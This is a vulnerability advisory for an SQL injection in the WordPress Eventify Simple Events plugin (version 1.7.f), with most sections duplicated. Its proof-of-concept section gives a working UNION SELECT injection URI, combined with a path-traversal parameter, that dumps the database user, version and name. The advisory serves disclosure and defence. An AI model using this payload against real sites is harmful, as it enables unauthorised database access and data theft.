WordPress Eventify Simple Events 'fetcheventdetails.php' SQL Injection Vulnerability
BID:49485
Info
WordPress Eventify Simple Events 'fetcheventdetails.php' SQL Injection Vulnerability
| Bugtraq ID: | 49485 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 07 2011 12:00AM |
| Updated: | Sep 07 2011 12:00AM |
| Credit: | Miroslav Stampar |
| Vulnerable: |
WordPress Eventify Simple Events 1.7.f |
| Not Vulnerable: | |
Discussion
WordPress Eventify Simple Events 'fetcheventdetails.php' SQL Injection Vulnerability
The WordPress Eventify Simple Events plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Eventify Simple Events versions 1.7.f and prior are vulnerable.
The WordPress Eventify Simple Events plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Eventify Simple Events versions 1.7.f and prior are vulnerable.
Exploit / POC
WordPress Eventify Simple Events 'fetcheventdetails.php' SQL Injection Vulnerability
The following example URI is available:
http://www.example.com/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php?npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9--%20
The following example URI is available:
http://www.example.com/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php?npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9--%20
Solution / Fix
WordPress Eventify Simple Events 'fetcheventdetails.php' SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
WordPress Eventify Simple Events 'fetcheventdetails.php' SQL Injection Vulnerability
References:
References:
- Plugin Homepage (Wordpress)
- WordPress Homepage (WordPress)